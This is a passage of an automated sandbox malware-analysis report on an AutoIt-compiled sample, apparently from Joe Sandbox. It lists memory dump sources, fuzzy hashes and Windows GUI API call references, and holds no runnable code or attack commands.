                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 0
                                                                                  • API String ID: 0-4108050209
                                                                                  • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                  • Instruction ID: 4e909ecabfc189c050416c4e24ff40cea0d51028d769430d5c257ad4b794abf4
                                                                                  • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                  • Instruction Fuzzy Hash: 1251537160CFC55AFB38856B885AFBEA3899F72354F180919E886C72C3CB15DE41D352
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 0&)
                                                                                  • API String ID: 0-1514547146
                                                                                  • Opcode ID: e4546ce68b647872cb063fe481ccd53bea59890b762ec103f6fded22a930bf24
                                                                                  • Instruction ID: 13693c7603fb37c2fa8638226592736626702178b9ec9e0938927db238f0dd0f
                                                                                  • Opcode Fuzzy Hash: e4546ce68b647872cb063fe481ccd53bea59890b762ec103f6fded22a930bf24
                                                                                  • Instruction Fuzzy Hash: F221A572621615CBDB2CCE79D82267E73E9A764310F15862EE4A7C77D0DE35A908CB80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 08df3326bb580976d5351816961e6d97fd93f092ecc2c1a2c644a3b177dbeac1
                                                                                  • Instruction ID: 0ef7845f3ccc10fa6784d7bbe6f71c42e34e3cb31ab25901f61ffe203bc7f2fb
                                                                                  • Opcode Fuzzy Hash: 08df3326bb580976d5351816961e6d97fd93f092ecc2c1a2c644a3b177dbeac1
                                                                                  • Instruction Fuzzy Hash: 6C324522D29F058DD7239634EC26335A289AFB73C5F15D737F81AB59AAEB69C4834100
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d64b4329b37b360f1961f9d2510ea67e639423ad8715a625ffd8e7325eed5086
                                                                                  • Instruction ID: 1b1a0133d19478de2a6a0413668ccbf7de939f514b0507fd80a5fef2da513d44
                                                                                  • Opcode Fuzzy Hash: d64b4329b37b360f1961f9d2510ea67e639423ad8715a625ffd8e7325eed5086
                                                                                  • Instruction Fuzzy Hash: 7D320139AA41568BCF28CE28C4946FDB7E1AF55314F38856BD54A8B291D330DDE1DB80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bddb51ef4279e3a994a2c9626c932b62d2145098846f4a6734796defd4161df9
                                                                                  • Instruction ID: b50a3c51691874a2b5dfcfa777708623cbca7366d52a1471a9aed0a7cb1cc820
                                                                                  • Opcode Fuzzy Hash: bddb51ef4279e3a994a2c9626c932b62d2145098846f4a6734796defd4161df9
                                                                                  • Instruction Fuzzy Hash: AD22AE70A0061A9FDF14CFA4D881BAEB7B5FF68300F144529E816A7291EB76DE51CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 71209b0e26090d45e192e861f724d2a922a5edc863bfb4c32e5387a4441ff1b8
                                                                                  • Instruction ID: e24f0c92d0778868042e79c557b2e551f4b56faa26667737dc0c5905bfa52370
                                                                                  • Opcode Fuzzy Hash: 71209b0e26090d45e192e861f724d2a922a5edc863bfb4c32e5387a4441ff1b8
                                                                                  • Instruction Fuzzy Hash: 1A02C6B0A10206EBDF04DF64D881BADB7B5FF54300F118569E8169B2D1EB71EA61CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                  • Instruction ID: 931509616d8bf165d99cd0e9c1a0e9f3c528b4b95f6854edd335ae059bbae0f9
                                                                                  • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                  • Instruction Fuzzy Hash: 1D9164736084E35ADB2E467B857847EFFE16A923A131A079DE4F2CB1C1EF348954D620
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                  • Instruction ID: 1493d4155a53294820b28132b5db5015db359a1a59c3f5654349fadbec20a757
                                                                                  • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                  • Instruction Fuzzy Hash: 93911F722098E35ADB2D467B857407EFEF15A923A231A07AED4F2CB1C1FF348554D620
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ab4c74c095737144c1e96050abed50a8a92352ce482af680aae116f619f9c238
                                                                                  • Instruction ID: 1edfbe7df4942cb11ebe2e8bcfcc9249b7a12324317b5ecd2eeb9069358ce53a
                                                                                  • Opcode Fuzzy Hash: ab4c74c095737144c1e96050abed50a8a92352ce482af680aae116f619f9c238
                                                                                  • Instruction Fuzzy Hash: B6616B71608FCA96FA38A92B9C95BBE7398DF91700F28092DE843DB2C1D7119E428315
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dff6ee6f5bb2b81569163fceee9170094af7641033ecafbd8ff7eae16d5b7db9
                                                                                  • Instruction ID: f858ae5698d6b432db3aebf1cece98875831e8fc2289f2338295ac5748205591
                                                                                  • Opcode Fuzzy Hash: dff6ee6f5bb2b81569163fceee9170094af7641033ecafbd8ff7eae16d5b7db9
                                                                                  • Instruction Fuzzy Hash: 06618971208FC966FE3D9AAB5C95BBF6389FF52740F100959E942CB2C1EB129D428315
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                  • Instruction ID: 407dc875b9638820fa378fadc89c1d2916af9e9d8084f2ed9277171482bd2c61
                                                                                  • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                  • Instruction Fuzzy Hash: 758172736088E35ADB2D423B857447EFFE15A927A531A079ED4F2CA1C2EF348554E620
                                                                                  APIs
                                                                                  • DeleteObject.GDI32(00000000), ref: 00242B30
                                                                                  • DeleteObject.GDI32(00000000), ref: 00242B43
                                                                                  • DestroyWindow.USER32 ref: 00242B52
                                                                                  • GetDesktopWindow.USER32 ref: 00242B6D
                                                                                  • GetWindowRect.USER32(00000000), ref: 00242B74
                                                                                  • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00242CA3
                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00242CB1
                                                                                  • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00242CF8
                                                                                  • GetClientRect.USER32(00000000,?), ref: 00242D04
                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00242D40
                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00242D62
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00242D75
                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00242D80
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00242D89
                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00242D98
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00242DA1
                                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00242DA8
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00242DB3
                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00242DC5
                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,0025FC38,00000000), ref: 00242DDB
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00242DEB
                                                                                  • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00242E11
                                                                                  • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00242E30
                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00242E52
                                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0024303F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                  • API String ID: 2211948467-2373415609
                                                                                  • Opcode ID: 661b68695557b4ce0817e0e75632f028f758adb163bf568c85ca4973efaed74c
                                                                                  • Instruction ID: b71ec36e83b85bbab2f5a2c931cb4fe5d5f1c3a2162b05fea9028374a0798e60
                                                                                  • Opcode Fuzzy Hash: 661b68695557b4ce0817e0e75632f028f758adb163bf568c85ca4973efaed74c
                                                                                  • Instruction Fuzzy Hash: 25029971910205EFDB18DFA5EC89EAE7BB9EB48311F108158F915AB2A1DB70ED04CF64
                                                                                  APIs
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0025712F
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00257160
                                                                                  • GetSysColor.USER32(0000000F), ref: 0025716C
                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 00257186
                                                                                  • SelectObject.GDI32(?,?), ref: 00257195
                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 002571C0
                                                                                  • GetSysColor.USER32(00000010), ref: 002571C8
                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 002571CF
                                                                                  • FrameRect.USER32(?,?,00000000), ref: 002571DE
                                                                                  • DeleteObject.GDI32(00000000), ref: 002571E5
                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00257230
                                                                                  • FillRect.USER32(?,?,?), ref: 00257262
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00257284
                                                                                    • Part of subcall function 002573E8: GetSysColor.USER32(00000012), ref: 00257421
                                                                                    • Part of subcall function 002573E8: SetTextColor.GDI32(?,?), ref: 00257425
                                                                                    • Part of subcall function 002573E8: GetSysColorBrush.USER32(0000000F), ref: 0025743B
                                                                                    • Part of subcall function 002573E8: GetSysColor.USER32(0000000F), ref: 00257446
                                                                                    • Part of subcall function 002573E8: GetSysColor.USER32(00000011), ref: 00257463
                                                                                    • Part of subcall function 002573E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00257471
                                                                                    • Part of subcall function 002573E8: SelectObject.GDI32(?,00000000), ref: 00257482
                                                                                    • Part of subcall function 002573E8: SetBkColor.GDI32(?,00000000), ref: 0025748B
                                                                                    • Part of subcall function 002573E8: SelectObject.GDI32(?,?), ref: 00257498
                                                                                    • Part of subcall function 002573E8: InflateRect.USER32(?,000000FF,000000FF), ref: 002574B7
                                                                                    • Part of subcall function 002573E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002574CE
                                                                                    • Part of subcall function 002573E8: GetWindowLongW.USER32(00000000,000000F0), ref: 002574DB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                  • String ID:
                                                                                  • API String ID: 4124339563-0
                                                                                  • Opcode ID: a2d8a9d13ac1cd051d7b916d7a069f39650e8e3836c41ae29a3492c8aefe6335
                                                                                  • Instruction ID: c6a18773671c56ba208e8085df916756ef74a72970f8e432188af47dda629cf8
                                                                                  • Opcode Fuzzy Hash: a2d8a9d13ac1cd051d7b916d7a069f39650e8e3836c41ae29a3492c8aefe6335
                                                                                  • Instruction Fuzzy Hash: B6A1A172018702BFDB009F60EC4CA5B7BA9FB49322F204A19F966A61E1E770E954CB55
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(?,?), ref: 001D8E14
                                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00216AC5
                                                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00216AFE
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00216F43
                                                                                    • Part of subcall function 001D8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001D8BE8,?,00000000,?,?,?,?,001D8BBA,00000000,?), ref: 001D8FC5
                                                                                  • SendMessageW.USER32(?,00001053), ref: 00216F7F
                                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00216F96
                                                                                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 00216FAC
                                                                                  • ImageList_Destroy.COMCTL32(00000000,?), ref: 00216FB7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                  • String ID: 0
                                                                                  • API String ID: 2760611726-4108050209
                                                                                  • Opcode ID: d0a39c87a4a71e57ee4420c16f2a4e4966e3a3170123bd39f10bcfcbfb6d82e6
                                                                                  • Instruction ID: 13e56f7db5fc92f925d68e39a4f290eea1ae8af48cdf7d18698a2cc9b25eb33d
                                                                                  • Opcode Fuzzy Hash: d0a39c87a4a71e57ee4420c16f2a4e4966e3a3170123bd39f10bcfcbfb6d82e6
                                                                                  • Instruction Fuzzy Hash: 5012AD30214202DFDB25CF14D88CBEAB7E5FB68305F14456AE4859B661DB31ECA2CF91
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(00000000), ref: 0024273E
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0024286A
                                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 002428A9
                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 002428B9
                                                                                  • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00242900
                                                                                  • GetClientRect.USER32(00000000,?), ref: 0024290C
                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00242955
                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00242964
                                                                                  • GetStockObject.GDI32(00000011), ref: 00242974
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00242978
                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00242988
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00242991
                                                                                  • DeleteDC.GDI32(00000000), ref: 0024299A
                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002429C6
                                                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 002429DD
                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00242A1D
                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00242A31
                                                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00242A42
                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00242A77
                                                                                  • GetStockObject.GDI32(00000011), ref: 00242A82
                                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00242A8D
                                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00242A97
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                  • API String ID: 2910397461-517079104
                                                                                  • Opcode ID: 55eda87a3d3ee4575f663b0988414d51d86a1c651b8ac54deee3baf8ff973efe
                                                                                  • Instruction ID: 1ca27ecd4500dd09e538e0c73e3d55b23c96f5d735af5963bce76806aee0dae5
